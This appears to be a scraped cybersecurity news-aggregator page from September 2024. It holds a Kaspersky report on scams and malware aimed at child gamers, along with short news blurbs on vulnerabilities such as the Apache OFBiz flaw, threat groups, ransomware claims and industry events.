"validates that a view should permit anonymous access if a user is unauthenticated, rather than performing authorization checks purely based on the target controller." Importance of Security in Open-Source Software The discovery of CVE-2024-45195 serves as a reminder of the importance of security in open-source software. While open-source tools offer numerous benefits, they also require consistent vigilance and patching to address vulnerabilities promptly. Users are responsible for keeping their deployments up-to-date and implementing additional security measures to mitigate risks. The patching of CVE-2024-45195 is a positive step forward, but it's vital to remain vigilant. The ever-evolving cyber threat landscape necessitates continuous monitoring and proactive security measures. By implementing a comprehensive security strategy, organizations using OFBiz can minimize their attack surface and safeguard their critical data.

image for How cybercriminals a ...

 News

The new school year brings with it new hopes, new subjects, new friends and new (and not-so-new) video games. After the long summer break, its natural for kids to dive back into the cyberworld. When schools in, theres less time for hanging out with friends at the mall, so the digital space becomes the preferred   show more ...

meet-up place, including, of course, video games. But the world of gaming isnt quite as buddy-buddy as might seem at first glance, so here too cybersecurity is a must. Sure, the games themselves are (mostly) fine — the problem is the parasite scammers and cybercriminals they attract. Kaspersky experts have dug deep to find out which games and players are most at risk, and what to do about it. See the full version of our report for answers to these, and other related questions. Attackers love Minecraft To fathom the threatscape facing young gamers, our experts analyzed statistics from the global Kaspersky Security Network (KSN). KSN collects huge amounts of anonymous cyberthreat intelligence data that we receive from users on a voluntary basis. Selecting the most popular kids games for the study, we found the top four most-attacked titles from July 2023–July 2024 were Minecraft, Roblox, Among Us and Brawl Stars. Game name Number of attack attempts Minecraft 3,094,057 Roblox 1,649,745 Among Us 945,571 Brawl Stars 309,554 Five Nights at Freddys 219,033 Fortnite 165,859 Angry Birds 66,754 The Legend of Zelda 33,774 Toca Life World 28,360 Valorant 28,119 Mario Kart 14,682 Subway Surfers 14,254 Overwatch 2 9,076 Animal Crossing 8,262 Apex Legend 8,133 Thats right, more than three million attack attempts on Minecraft alone! Almost twice more than on second-place Roblox. Why? Because so many players are looking to download mods and cheats for Minecraft, and these often turn out to be malicious apps. As for the types of threats being spread, the most common are downloaders, adware, Trojans and backdoors. For several years now, malware downloaders have been the most live threat to the gaming industry — downloaders that tout themselves as the best Minecraft modloader you can get often turn out to download backdoors, Trojans and other threats. Popular phishing scams While its easy to teach your kids to download apps only from trusted sources and use security solutions, keeping them safe from phishing is more of a challenge. Here, it pays to keep your ears and eyes sharp: the more you and your kids know and read about new scams, the better placed you are to spot them. Whats more, most gaming scams tend to follow a pattern. Free skins Pretty much every top kids game these days allows (or encourages) players to customize their character with skins that can cost serious money — millions of dollars in some cases! Most kids, of course, dont have that kind of cash under the bed, so theyre always on the lookout for flashy item giveaways. One such act of generosity was uncovered by our experts. The scammers craftily exploited two things close to young gamer hearts: Valorant and MrBeast. The first is a popular shooter game, while the other is one of the worlds most successful YouTubers, with a 300 million+ subscriber base – mostly kids. MrBeast and the makers of Valorant probably have no idea about their skin giveaway collaboration on a scam website The scammers invite gamers to log in to the phishing site using their game account credentials and then to open a treasure chest. Of course, there is no treasure — only a hijacked account. Free in-game currency Most in-game economies are built on two kinds of in-game currency: soft and hard. Soft currency is usually earned through playing the game; hard or premium currency is bought with real-world money. Naturally, its the latter that attracts cybercriminals. For example, one scam asks Pokémon GO players to enter their game account username. That is followed by an Im not a bot verification, after which the player lands on a site promising free in-game currency. Catchy phishing site targeting young Pokémon GO players Such calls to action are a ruse to redirect users to a far more serious scam, where not only gaming accounts are at stake, but highly sensitive data like bank details. Reward for in-game actions Do such_and_such and win a prize! is a standard cybercriminal trick. We unearthed such a scam on a Roblox-related phishing site: victims were offered a US$100 Walmart gift card, the same amount for Taco Bell fast food outlets, and, for the especially greedy, US$25,000 in cash. But theres a catch: first your payment details, please! Curious reward lineup: a US$100 voucher alongside US$25,000 in cash Since the youngest gamers dont yet have payment details of their own, theyll probably feed their parents bank card numbers to the hungry site. And you can only imagine mom and dads delight when the next billing statement arrives. How young gamers can stay safe Kids often lack basic cybersecurity skills, so can easily fall into cybercriminal traps for example, when trying to download a free game, a mod or a must-have skin. Thats why teaching kids cyber hygiene is one of the most important missions of modern parenting. Help your child think up a unique strong password, and get them used to using a password manager at an early age. Tell your child about the risks they might face online. Our Kaspersky Cybersecurity Alphabet is a fun and informative way to teach your kids about new technologies and basic cyber hygiene, and refresh your own knowledge at the same time. Install reliable protection for gamers on all devices. Be in the swim of the latest scams in the gaming world and warn your kids what to watch out for. Use special apps to keep your kids safe — both online and offline. For more great security tips for young gamers, check out the full version of our report.

image for What is the Shared F ...

 Feed

New threats, an overburdened workforce, and regulatory pressures mean cloud service providers need a more resilient model than the shared responsibility framework. That's where "shared fate" comes in.

 Malware and Vulnerabilities

Praetorian has uncovered GoffLoader, an in-memory execution tool that allows security professionals to run BOF and unmanaged Cobalt Strike PE files directly in memory without writing to disk.

 Malware and Vulnerabilities

Progress Software has alerted users to a critical vulnerability (CVE-2024-7591) in its LoadMaster ADC and load balancer solution. The flaw, with a CVSS score of 10, allows remote attackers to execute system commands without authentication.

 Threat Actors

The group, active since at least 2023, exclusively targets companies in these countries. They use modern techniques to gain initial access to systems, primarily through phishing emails with custom malware like PhantomDL and PhantomCore.

 Malware and Vulnerabilities

A critical vulnerability (CVE-2024-2169) in Webmin/Virtualmin control panels allows for launching DoS attacks. This flaw reveals IP addresses through the UDP service on port 10000, enabling attackers to create a loop of traffic between servers.

 Threat Actors

MuddyWater, an Iranian hacker group since 2017, has been using legitimate RMM software to target organizations globally, focusing on government, military, telecom, and oil sectors.

 Identity Theft, Fraud, Scams

The fake landing pages closely mimicked the real Lowe's portal, prompting employees to enter their sales numbers, passwords, and security question answers, which then were sent to attackers.

 Security Products & Services

Respotter is an open-source honeypot designed to detect attackers when they launch Responder within your environment. This application identifies active instances of Responder by exploiting its behavior when responding to any DNS query.

 Feed

Ubuntu Security Notice 6991-1 - It was discovered that AIOHTTP did not properly restrict file access when the 'follow_symlinks' option was set to True. A remote attacker could possibly use this issue to access unauthorized files on the system.

 Feed

Red Hat Security Advisory 2024-6418-03 - An update for bubblewrap and flatpak is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.

 Feed

A new security flaw has been addressed in the Apache OFBiz open-source enterprise resource planning (ERP) system that, if successfully exploited, could lead to unauthenticated remote code execution on Linux and Windows. The high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5), affects all versions of the software before 18.12.16. "An attacker with no valid

 Feed

Telegram CEO Pavel Durov has broken his silence nearly two weeks after his arrest in France, stating the charges are misguided. "If a country is unhappy with an internet service, the established practice is to start a legal action against the service itself," Durov said in a 600-word statement on his Telegram account. "Using laws from the pre-smartphone era to charge a CEO with crimes committed

 Feed

Cybersecurity researchers have discovered yet another critical security flaw in the LiteSpeed Cache plugin for WordPress that could allow unauthenticated users to take control of arbitrary accounts. The vulnerability, tracked as CVE-2024-44000 (CVSS score: 7.5), impacts versions before and including 6.4.1. It has been addressed in version 6.5.0.1.  "The plugin suffers from an

 Feed

The 2024 State of the vCISO Report continues Cynomi’s tradition of examining the growing popularity of virtual Chief Information Security Officer (vCISO) services. According to the independent survey, the demand for these services is increasing, with both providers and clients reaping the rewards. The upward trend is set to continue, with even faster growth expected in the future. However,

 Feed

SonicWall has revealed that a recently patched critical security flaw impacting SonicOS may have come under active exploitation, making it essential that users apply the patches as soon as possible. The vulnerability, tracked as CVE-2024-40766, carries a CVSS score of 9.3 out of a maximum of 10. "An improper access control vulnerability has been identified in the SonicWall SonicOS management

 Feed

A recently disclosed security flaw in OSGeo GeoServer GeoTools has been exploited as part of multiple campaigns to deliver cryptocurrency miners, botnet malware such as Condi and JenX, and a known backdoor called SideWalk. The security vulnerability is a critical remote code execution bug (CVE-2024-36401, CVSS score: 9.8) that could allow malicious actors to take over susceptible instances. In

 Feed

Threat actors have long leveraged typosquatting as a means to trick unsuspecting users into visiting malicious websites or downloading booby-trapped software and packages. These attacks typically involve registering domains or packages with names slightly altered from their legitimate counterparts (e.g., goog1e.com vs. google.com). Adversaries targeting open-source repositories across

 claims

Source: www.databreachtoday.com – Author: 1 Fraud Management & Cybercrime , Healthcare , HIPAA/HITECH Experts Say Orgs That Handle Highly Sensitive Health Info Are Targets of Attacks Marianne Kolbasuk McGee (HealthInfoSec) • September 5, 2024     Image: Planned Parenthood of Montana Planned Parenthood   show more ...

of Montana, which provides patients with reproductive healthcare services including birth control […] La entrada RansomHub Claims Theft of Montana Planned Parenthood Data – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Customers

Source: www.databreachtoday.com – Author: 1 Kaspersky Hands Off 1 Million US Customers to UltraAV Amid Government Software Ban Michael Novinson (MichaelNovinson) • September 5, 2024     U.S. customers of blacklisted Russian cybersecurity antivirus provider Kaspersky who didn’t already swap out   show more ...

providers now know where they’ll be getting endpoint protection going forward. See Also: Introduction […] La entrada Kaspersky US Customers Migrate to Pango’s UltraAV After Ban – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.databreachtoday.com – Author: 1 Artificial Intelligence & Machine Learning , Next-Generation Technologies & Secure Development Ilya Sutskever Aims to Build Safe, Super-Intelligent AI Rashmi Ramesh (rashmiramesh_) • September 5, 2024     Safe Superintelligence Inc. founder Ilya   show more ...

Sutskever says he will use $1 billion to “scale in peace.” (Image: Shutterstock) A three-month-old startup promising […] La entrada Former OpenAI Scientist’s Startup Raises $1B Seed Funding – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.databreachtoday.com – Author: 1 FEMA CIO: Cyber Advisers Provide Critical Security Guidance Amid Recovery Efforts Chris Riotta (@chrisriotta) • September 5, 2024     FEMA has deployed cyber advisers either physically or virtually to all disaster zones in 2024. (Image: Shutterstock) The U.S.   show more ...

Federal Emergency Management Agency isn’t just about emergency water and shelters […] La entrada FEMA Has Begun Deploying Cyber Advisers to Disaster Zones – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

2024-09
Aggregator history
Friday, September 06
SUN
MON
TUE
WED
THU
FRI
SAT
SeptemberOctoberNovember